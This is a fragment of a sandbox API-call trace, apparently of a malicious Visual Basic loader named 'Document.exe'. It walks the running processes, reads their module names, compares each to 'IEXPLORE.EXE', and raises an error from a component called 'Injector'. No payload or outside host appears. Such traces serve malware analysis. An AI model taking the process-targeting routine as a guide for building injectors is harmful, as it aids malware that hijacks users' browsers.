dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.414] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.415] GetLastError () returned 0x0 [0204.415] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x890000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="pentium-southampton.exe") returned 0x17 [0204.415] GetLastError () returned 0x0 [0204.415] SysStringByteLen (bstr="数瑮畩⵭潳瑵慨灭潴⹮硥e") returned 0x104 [0204.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.416] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.417] GetLastError () returned 0x0 [0204.417] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xed0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="declare.exe") returned 0xb [0204.417] GetLastError () returned 0x0 [0204.417] SysStringByteLen (bstr="敤汣牡⹥硥e") returned 0x104 [0204.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.417] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.418] GetLastError () returned 0x0 [0204.419] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x140000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="credit-albania.exe") returned 0x12 [0204.419] GetLastError () returned 0x0 [0204.419] SysStringByteLen (bstr="牣摥瑩愭扬湡慩攮數") returned 0x104 [0204.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.419] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.420] GetLastError () returned 0x0 [0204.420] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x3f0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="celebrate.exe") returned 0xd [0204.421] GetLastError () returned 0x0 [0204.421] SysStringByteLen (bstr="散敬牢瑡⹥硥e") returned 0x104 [0204.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.421] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.422] GetLastError () returned 0x0 [0204.422] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x12d0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="watson_block.exe") returned 0x10 [0204.422] GetLastError () returned 0x0 [0204.422] SysStringByteLen (bstr="慷獴湯扟潬正攮數") returned 0x104 [0204.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.423] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.425] GetLastError () returned 0x0 [0204.425] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x1080000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="beef-http-plants.exe") returned 0x14 [0204.425] GetLastError () returned 0x0 [0204.425] SysStringByteLen (bstr="敢晥栭瑴⵰汰湡獴攮數") returned 0x104 [0204.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.425] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.426] GetLastError () returned 0x0 [0204.427] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xe50000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="hunting garmin marriage.exe") returned 0x1b [0204.427] GetLastError () returned 0x0 [0204.427] SysStringByteLen (bstr="畨瑮湩⁧慧浲湩洠牡楲条⹥硥e") returned 0x104 [0204.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.427] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.428] GetLastError () returned 0x0 [0204.428] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xae0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="portsmouth_sauce_certificates.exe") returned 0x21 [0204.429] GetLastError () returned 0x0 [0204.429] SysStringByteLen (bstr="潰瑲浳畯桴獟畡散损牥楴楦慣整⹳硥e") returned 0x104 [0204.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.429] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.430] GetLastError () returned 0x0 [0204.430] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="insights hu.exe") returned 0xf [0204.430] GetLastError () returned 0x0 [0204.431] SysStringByteLen (bstr="湩楳桧獴栠⹵硥e") returned 0x104 [0204.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.431] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.432] GetLastError () returned 0x0 [0204.432] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xdf0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="stroke_enough_reporter.exe") returned 0x1a [0204.432] GetLastError () returned 0x0 [0204.432] SysStringByteLen (bstr="瑳潲敫敟潮杵彨敲潰瑲牥攮數") returned 0x104 [0204.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.433] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.434] GetLastError () returned 0x0 [0204.434] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xa0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="por tramadol started.exe") returned 0x18 [0204.434] GetLastError () returned 0x0 [0204.434] SysStringByteLen (bstr="潰⁲牴浡摡汯猠慴瑲摥攮數") returned 0x104 [0204.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.434] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.435] GetLastError () returned 0x0 [0204.436] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xd40000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="add.exe") returned 0x7 [0204.436] GetLastError () returned 0x0 [0204.436] SysStringByteLen (bstr="摡⹤硥e") returned 0x104 [0204.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.436] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.437] GetLastError () returned 0x0 [0204.437] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0xcd0000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="argentinasovietavg.exe") returned 0x16 [0204.438] GetLastError () returned 0x0 [0204.438] SysStringByteLen (bstr="牡敧瑮湩獡癯敩慴杶攮數") returned 0x104 [0204.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.438] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.438] GetLastError () returned 0x12b [0204.438] CloseHandle (hObject=0x10c) returned 1 [0204.438] GetLastError () returned 0x12b [0204.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x0 [0204.438] GetLastError () returned 0x5 [0204.438] CloseHandle (hObject=0x0) returned 0 [0204.438] GetLastError () returned 0x6 [0204.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x0 [0204.438] GetLastError () returned 0x5 [0204.438] CloseHandle (hObject=0x0) returned 0 [0204.438] GetLastError () returned 0x6 [0204.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0204.486] GetLastError () returned 0x5 [0204.486] CloseHandle (hObject=0x0) returned 0 [0204.486] GetLastError () returned 0x6 [0204.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x0 [0204.486] GetLastError () returned 0x5 [0204.486] CloseHandle (hObject=0x0) returned 0 [0204.487] GetLastError () returned 0x6 [0204.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x0 [0204.487] GetLastError () returned 0x5 [0204.487] CloseHandle (hObject=0x0) returned 0 [0204.487] GetLastError () returned 0x6 [0204.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x278) returned 0x10c [0204.487] GetLastError () returned 0x6 [0204.487] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 0 [0204.487] GetLastError () returned 0x12b [0204.487] CloseHandle (hObject=0x10c) returned 1 [0204.487] GetLastError () returned 0x12b [0204.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x0 [0204.487] GetLastError () returned 0x5 [0204.487] CloseHandle (hObject=0x0) returned 0 [0204.487] GetLastError () returned 0x6 [0204.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0204.487] GetLastError () returned 0x5 [0204.487] CloseHandle (hObject=0x0) returned 0 [0204.487] GetLastError () returned 0x6 [0204.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa38) returned 0x10c [0204.487] GetLastError () returned 0x6 [0204.487] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.488] GetLastError () returned 0x0 [0204.489] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0204.489] GetLastError () returned 0x0 [0204.489] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0204.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.489] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0204.489] CloseHandle (hObject=0x10c) returned 1 [0204.489] GetLastError () returned 0x0 [0204.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0x10c [0204.489] GetLastError () returned 0x0 [0204.489] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.490] GetLastError () returned 0x0 [0204.491] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="Document.exe") returned 0xc [0204.491] GetLastError () returned 0x0 [0204.491] SysStringByteLen (bstr="潄畣敭瑮攮數") returned 0x104 [0204.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.491] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="DOCUMENT.EXE", lcid=0x0, dwFlags=0x30001) returned 0x2 [0204.491] CloseHandle (hObject=0x10c) returned 1 [0204.491] GetLastError () returned 0x0 [0204.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x0 [0204.491] GetLastError () returned 0x5 [0204.491] CloseHandle (hObject=0x0) returned 0 [0204.491] GetLastError () returned 0x6 [0204.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x10c [0204.491] GetLastError () returned 0x6 [0204.492] EnumProcessModules (in: hProcess=0x10c, lphModule=0x68e800, cb=0x1000, lpcbNeeded=0x18f8e8 | out: lphModule=0x68e800, lpcbNeeded=0x18f8e8) returned 1 [0204.493] GetLastError () returned 0x0 [0204.494] GetModuleBaseNameA (in: hProcess=0x10c, hModule=0x400000, lpBaseName=0x5e321c, nSize=0x104 | out: lpBaseName="iexplore.exe") returned 0xc [0204.494] GetLastError () returned 0x0 [0204.494] SysStringByteLen (bstr="敩灸潬敲攮數") returned 0x104 [0204.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e321c, cbMultiByte=260, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 260 [0204.494] VarBstrCmp (bstrLeft="IEXPLORE.EXE", bstrRight="IEXPLORE.EXE", lcid=0x0, dwFlags=0x30001) returned 0x1 [0204.494] CloseHandle (hObject=0x10c) returned 1 [0204.494] GetLastError () returned 0x0 [0204.494] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0204.494] SafeArrayDestroyDescriptor (psa=0x3810068) returned 0x0 [0204.494] GetCurrentThreadId () returned 0x94c [0204.494] GetCurrentThreadId () returned 0x94c [0204.495] IMalloc:Alloc (This=0x75e366bc, cb=0x710) returned 0x380f050 [0204.499] CreateErrorInfo (in: pperrinfo=0x18f974 | out: pperrinfo=0x18f974*=0x381083c) returned 0x0 [0204.499] LoadStringA (in: hInstance=0x72940000, uID=0x2738, lpBuffer=0x18f4b8, cchBufferMax=500 | out: lpBuffer="Application-defined or object-defined error") returned 0x2b [0204.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f4b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0204.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f4b8, cbMultiByte=-1, lpWideCharStr=0x5e2fcc, cchWideChar=44 | out: lpWideCharStr="Application-defined or object-defined error") returned 44 [0204.533] ICreateErrorInfo:SetGuid (This=0x381083c, rguid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0204.533] ICreateErrorInfo:SetSource (This=0x381083c, szSource="Injector") returned 0x0 [0204.533] ICreateErrorInfo:SetDescription (This=0x381083c, szDescription="Application-defined or object-defined error") returned 0x0 [0204.533] ICreateErrorInfo:SetHelpFile (This=0x381083c, szHelpFile=0x0) returned 0x0 [0204.533] ICreateErrorInfo:SetHelpContext (This=0x381083c, dwHelpContext=0xf429f) returned 0x0 [0204.533] IUnknown:QueryInterface (in: This=0x381083c, riid=0x729706e0*(Data1=0x1cf2b120, Data2=0x547d, Data3=0x101b, Data4=([0]=0x8e, [1]=0x65, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2b, [6]=0xd1, [7]=0x19)), ppvObject=0x18f970 | out: ppvObject=0x18f970*=0x3810838) returned 0x0 [0204.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x3810838) returned 0x0 [0204.534] IUnknown:Release (This=0x3810838) returned 0x2 [0204.534] IUnknown:Release (This=0x381083c) returned 0x1 [0204.534] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0204.534] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0204.537] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x18fb14 | out: pperrinfo=0x18fb14*=0x3810838) returned 0x0 [0204.537] IErrorInfo:GetSource (in: This=0x3810838, pBstrSource=0x2361704 | out: pBstrSource=0x2361704*="Injector") returned 0x0 [0204.537] IErrorInfo:GetDescription (in: This=0x3810838, pBstrDescription=0x2361708 | out: pBstrDescription=0x2361708*="Application-defined or object-defined error") returned 0x0 [0204.537] IErrorInfo:GetHelpFile (in: This=0x3810838, pBstrHelpFile=0x236170c | out: pBstrHelpFile=0x236170c*=0x0) returned 0x0 [0204.537] IErrorInfo:GetHelpContext (in: This=0x3810838, pdwHelpContext=0x2361710 | out: pdwHelpContext=0x2361710*=0xf429f) returned 0x0 [0204.538] IUnknown:Release (This=0x3810838) returned 0x0 [0204.538] GetCurrentThreadId () returned 0x94c [0204.538] GetCurrentThreadId () returned 0x94c [0204.538] GetCurrentThreadId () returned 0x94c [0204.538] CoDisconnectObject (pUnk=0x5df050, dwReserved=0x0) returned 0x0 [0204.538] IUnknown:QueryInterface (in: This=0x5df050, riid=0x75d33e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18fa2c | out: ppvObject=0x18fa2c*=0x0) returned 0x80004002 [0204.538] IUnknown:QueryInterface (in: This=0x5df050, riid=0x75d39b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18fa3c | out: ppvObject=0x18fa3c*=0x5df06c) returned 0x0 [0204.538] IUnknown:Release (This=0x5df06c) returned 0x3 [0204.538] CoDisconnectObject (pUnk=0x5e3c50, dwReserved=0x0) returned 0x0 [0204.538] IUnknown:QueryInterface (in: This=0x5e3c50, riid=0x75d33e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18fa2c | out: ppvObject=0x18fa2c*=0x237b7d8) returned 0x0 [0204.539] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Visual Basic\\6.0", phkResult=0x18f9b4 | out: phkResult=0x18f9b4*=0x118) returned 0x0 [0204.539] RegQueryValueExA (in: hKey=0x118, lpValueName="AllowUnsafeObjectPassing", lpReserved=0x0, lpType=0x18f9ac, lpData=0x18f8ac, lpcbData=0x18f9b0*=0x100 | out: lpType=0x18f9ac*=0x0, lpData=0x18f8ac*=0x44, lpcbData=0x18f9b0*=0x100) returned 0x2 [0204.539] RegCloseKey (hKey=0x118) returned 0x0 [0204.539] IMarshal:DisconnectObject (This=0x237b7d8, dwReserved=0x0) returned 0x0 [0204.539] IUnknown:Release (This=0x237b7d8) returned 0x2 [0204.539] CoDisconnectObject (pUnk=0x5e31c8, dwReserved=0x0) returned 0x0 [0204.539] IUnknown:QueryInterface (in: This=0x5e31c8, riid=0x75d33e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18fa2c | out: ppvObject=0x18fa2c*=0x237b798) returned 0x0 [0204.540] IMarshal:DisconnectObject (This=0x237b798, dwReserved=0x0) returned 0x0 [0204.540] IUnknown:Release (This=0x237b798) returned 0x2 [0204.540] GetCurrentThreadId () returned 0x94c [0204.540] PostMessageA (hWnd=0x40222, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0204.540] GetCurrentThreadId () returned 0x94c [0204.540] PostMessageA (hWnd=0x40222, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0204.540] IMalloc:Free (This=0x75e366bc, pv=0x5e3c50) [0204.540] IMalloc:Free (This=0x75e366bc, pv=0x5e31c8) [0204.540] FreeLibrary (hLibModule=0x76220000) returned 1 [0204.540] FreeLibrary (hLibModule=0x76220000) returned 1 [0204.540] FreeLibrary (hLibModule=0x76220000) returned 1 [0204.541] FreeLibrary (hLibModule=0x75f90000) returned 1 [0204.541] FreeLibrary (hLibModule=0x75f90000) returned 1 [0204.541] FreeLibrary (hLibModule=0x75f90000) returned 1 [0204.541] FreeLibrary (hLibModule=0x76220000) returned 1 [0204.541] FreeLibrary (hLibModule=0x76220000) returned 1 [0204.541] FreeLibrary (hLibModule=0x77820000) returned 1 [0204.541] FindClose (in: hFindFile=0x5e3650 | out: hFindFile=0x5e3650) returned 1 [0204.542] GetCurrentThreadId () returned 0x94c [0204.542] SendMessageA (hWnd=0x40222, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 [0204.542] GetCurrentThreadId () returned 0x94c [0204.542] GetCapture () returned 0x0 [0204.542] ShowWindow (hWnd=0x7028c, nCmdShow=0) returned 0 [0204.542] IsChild (hWndParent=0x502a0, hWnd=0x702b6) returned 0 [0204.542] GetWindow (hWnd=0x502a0, uCmd=0x5) returned 0x502b8 [0204.542] GetWindow (hWnd=0x502b8, uCmd=0x2) returned 0x5028e [0204.542] GetParent (hWnd=0x502b8) returned 0x502a0 [0204.542] IsChild (hWndParent=0x502b8, hWnd=0x702b6) returned 0 [0204.542] GetWindow (hWnd=0x502b8, uCmd=0x5) returned 0x0 [0204.542] GetFocus () returned 0x0 [0204.542] DestroyWindow (hWnd=0x502b8) returned 1 [0204.542] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.542] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0204.543] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.543] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x420a09aa [0204.543] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0204.543] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.543] GetWindow (hWnd=0x5028e, uCmd=0x2) returned 0x402bc [0204.543] GetParent (hWnd=0x5028e) returned 0x502a0 [0204.543] IsChild (hWndParent=0x5028e, hWnd=0x702b6) returned 0 [0204.543] GetWindow (hWnd=0x5028e, uCmd=0x5) returned 0x0 [0204.543] GetFocus () returned 0x0 [0204.543] DestroyWindow (hWnd=0x5028e) returned 1 [0204.543] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.544] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0204.544] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.544] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x650a07c3 [0204.544] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0204.544] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.544] GetWindow (hWnd=0x402bc, uCmd=0x2) returned 0x0 [0204.544] GetParent (hWnd=0x402bc) returned 0x502a0 [0204.544] IsChild (hWndParent=0x402bc, hWnd=0x702b6) returned 0 [0204.544] GetWindow (hWnd=0x402bc, uCmd=0x5) returned 0x0 [0204.545] GetFocus () returned 0x0 [0204.545] DestroyWindow (hWnd=0x402bc) returned 1 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x420a09aa [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.545] GetFocus () returned 0x0 [0204.545] DestroyWindow (hWnd=0x502a0) returned 1 [0204.545] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x420a09aa [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502a0, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] IsChild (hWndParent=0x40278, hWnd=0x702b6) returned 0 [0204.546] GetWindow (hWnd=0x40278, uCmd=0x5) returned 0x0 [0204.546] GetFocus () returned 0x0 [0204.546] DestroyWindow (hWnd=0x40278) returned 1 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0204.546] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0204.547] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0204.547] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x650a07c3 [0204.547] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0204.547] 